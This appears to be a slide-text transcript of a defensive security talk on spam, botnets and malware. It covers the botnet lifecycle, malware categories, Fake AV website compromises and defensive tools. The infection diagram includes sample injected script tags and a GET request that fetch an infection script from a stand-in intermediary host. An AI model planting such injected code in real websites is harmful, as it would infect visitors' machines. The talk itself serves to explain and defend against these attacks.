spam/botnets and malware neil warner, cio, godaddy.com moderator: dan kaplan, deputy editor, sc...
TRANSCRIPT
SPAM/BOTNETS and Malware Neil Warner, CIO, GoDaddy.com Moderator: Dan Kaplan, deputy editor, SC Magazine
How do you Detect SPAM Mails?– Key words– Heuristics/Abnormal behavior
What can you do to defend against it?– SPAM Filters– Reputation services to block traffic from those
Spamming IP addresses– Take down the root cause
War Against SPAM
What are Botnets used for? How do we detect them? How can we defend Against it? Botnet lifecycle
– Bot-herder configures initial bot parameters such as infection vectors, payload, stealth, C&C details
– Register a DDNS– Register a static IP– Bot-herder launches or seeds new bot(s)– Bots spread– Causes an increase of DDoS being sent to the victim– Losing bots to rival botnets
Bot Army
Different types of Malware Broad Category
– Trojans, Rootkits, Backdoors Malware for Fun and Profit
– Spyware, Key loggers, Dialers, Bots, Proxies, SEO etc..
Grayware
Camouflaged Attacks
How Does Malware Happen
$$$$$$
<html>Holy Crap! Infected! Click Here to clean</html>
GET http://intermediary.com/ll.php
Make HTTP calls to infection script and site is infected
Compromised Attack Server(s)
Servers with Compromised Accounts(Zeus/Phishing/etc)
FTP/SSH Upload of Attack Shell/Script
Casual Web User Visits Infected Site
End Users
Fake AV
<script>http://intermediary.com/ll.php</script>
Disposable Domain Name
0 Day vulnerability in a web application or Web Server– Compromises the web sites– Redirects the end user to a malware site or competitors website.– Example: Fake AV Campaign
Fake AV
What Can We Do?
Network/Application Security toolsFirewallsIntrusion Prevention SystemsIntrusion Detection SystemsWeb Application FirewallsNetwork Access ControlsAntivirusReputation based AccessCode Audits
https://zeustracker.abuse.ch/ http://www.malwaredomainlist.com/ http://www.phishtank.com/ http://www.clean-mx.de/ http://en.wikipedia.org/wiki/Botnet http://en.wikipedia.org/wiki/Malware
References